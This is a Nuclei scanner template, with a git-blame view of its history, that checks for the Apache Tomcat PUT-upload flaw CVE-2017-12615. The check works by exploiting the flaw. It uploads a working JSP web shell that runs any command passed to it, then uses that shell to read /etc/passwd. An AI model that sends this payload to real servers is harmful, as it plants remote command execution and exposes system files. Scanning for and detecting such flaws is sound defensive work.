nuclei-templates/cves/2017/CVE-2017-12615.yaml

id: CVE-2017-12615

info:
  name: Apache Tomcat Servers - Remote Code Execution
  author: pikpikcu
  severity: high
  description: |
    Apache Tomcat servers 7.0.{0 to 79} are susceptible to remote code execution. By design, you are not allowed to upload JSP files via the PUT method. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on Apache Tomcat servers that have enabled PUT method by using a specially crafted HTTP request.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615
    - https://lists.apache.org/thread.html/8fcb1e2d5895413abcf266f011b9918ae03e0b7daceb118ffbf23f8c@%3Cannounce.tomcat.apache.org%3E
    - http://web.archive.org/web/20211206035549/https://securitytracker.com/id/1039392
    - https://nvd.nist.gov/vuln/detail/CVE-2017-12615
    - http://web.archive.org/web/20210616200000/https://www.securityfocus.com/bid/100901
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2017-12615
    cwe-id: CWE-434
  metadata:
    shodan-query: title:"Apache Tomcat"
  tags: cve,cve2017,apache,rce,tomcat,kev,cisa

requests:
  - method: PUT
    path:
      - "{{BaseURL}}/poc.jsp/"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: |
      <%@ page import="java.util.*,java.io.*"%>
      <%
      if (request.getParameter("cmd") != null) {
              out.println("Command: " + request.getParameter("cmd") + "<BR>");
              Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
              OutputStream os = p.getOutputStream();
              InputStream in = p.getInputStream();
              DataInputStream dis = new DataInputStream(in);
              String disr = dis.readLine();
              while ( disr != null ) {
                      out.println(disr);
                      disr = dis.readLine();
                      }
              }
      %>

  - method: GET
    path:
      - "{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/06/09
Create CVE-2017-12615 (#835) * Create CVE-2017-12615.yaml 2021-02-10 09:44:26 +00:00			`id: CVE-2017-12615`

			`info:`
Dashboard Content Enhancements (#4567) Dashboard Content Enhancements 2022-06-09 20:35:21 +00:00			`name: Apache Tomcat Servers - Remote Code Execution`
Create CVE-2017-12615 (#835) * Create CVE-2017-12615.yaml 2021-02-10 09:44:26 +00:00			`author: pikpikcu`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`severity: high`
Create CVE-2017-12615 (#835) * Create CVE-2017-12615.yaml 2021-02-10 09:44:26 +00:00			`description: \|`
Dashboard Content Enhancements (#4567) Dashboard Content Enhancements 2022-06-09 20:35:21 +00:00			`Apache Tomcat servers 7.0.{0 to 79} are susceptible to remote code execution. By design, you are not allowed to upload JSP files via the PUT method. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on Apache Tomcat servers that have enabled PUT method by using a specially crafted HTTP request.`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`- https://lists.apache.org/thread.html/8fcb1e2d5895413abcf266f011b9918ae03e0b7daceb118ffbf23f8c@%3Cannounce.tomcat.apache.org%3E`
Dead Site Removal (#4641) * Deleted buffalo-config-injection.yaml Add reference from buffalo-config-injection.yaml to CVE-2021-20091.yaml * Delete vulnerabilities/other/buffalo-config-injection.yaml * Link cleanups * Change links to Secunia to point to archive.org * Additonal link cleanup * replace securitytracker.com links with archive.org links 2022-07-01 10:02:07 +00:00			`- http://web.archive.org/web/20211206035549/https://securitytracker.com/id/1039392`
Dashboard Content Enhancements (#4567) Dashboard Content Enhancements 2022-06-09 20:35:21 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2017-12615`
Remove Links for Dead sites (#4554) * Deleted buffalo-config-injection.yaml Add reference from buffalo-config-injection.yaml to CVE-2021-20091.yaml * Delete vulnerabilities/other/buffalo-config-injection.yaml * Remove/replace links to dead sites: * archives.neohapsis.com * osvdb.org * securityfocus.com 2022-06-07 20:50:59 +00:00			`- http://web.archive.org/web/20210616200000/https://www.securityfocus.com/bid/100901`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 8.1`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`cve-id: CVE-2017-12615`
			`cwe-id: CWE-434`
Update CVE-2017-12615.yaml 2022-07-04 13:05:02 +00:00			`metadata:`
			`shodan-query: title:"Apache Tomcat"`
Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates into pr/4738 2022-08-08 18:28:46 +00:00			`tags: cve,cve2017,apache,rce,tomcat,kev,cisa`
Create CVE-2017-12615 (#835) * Create CVE-2017-12615.yaml 2021-02-10 09:44:26 +00:00
			`requests:`
			`- method: PUT`
			`path:`
			`- "{{BaseURL}}/poc.jsp/"`
			`headers:`
			`Content-Type: application/x-www-form-urlencoded`
			`body: \|`
Satisfying the linter (all errors and warnings) * whitespace modifications only 2021-08-19 14:44:46 +00:00			`<%@ page import="java.util.,java.io."%>`
			`<%`
			`if (request.getParameter("cmd") != null) {`
			`out.println("Command: " + request.getParameter("cmd") + "<BR>");`
			`Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));`
			`OutputStream os = p.getOutputStream();`
			`InputStream in = p.getInputStream();`
			`DataInputStream dis = new DataInputStream(in);`
			`String disr = dis.readLine();`
			`while ( disr != null ) {`
			`out.println(disr);`
			`disr = dis.readLine();`
			`}`
			`}`
			`%>`
Create CVE-2017-12615 (#835) * Create CVE-2017-12615.yaml 2021-02-10 09:44:26 +00:00
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd"`

			`matchers-condition: and`
			`matchers:`
			`- type: regex`
			`regex:`
Updated "/etc/passwd" regex to avoid possible false positive results. 2022-03-22 08:01:31 +00:00			`- "root:.*:0:0:"`
Apache Tomcat Template improvements (#3446) * Improved Tomcat matchers / extractors / paths * removed duplicate detections / matchers * removed duplicate template * Added missing tomcat tags 2021-12-29 13:40:59 +00:00
Create CVE-2017-12615 (#835) * Create CVE-2017-12615.yaml 2021-02-10 09:44:26 +00:00			`- type: status`
			`status:`
			`- 200`
Dashboard Content Enhancements (#4567) Dashboard Content Enhancements 2022-06-09 20:35:21 +00:00
			`# Enhanced by mp on 2022/06/09`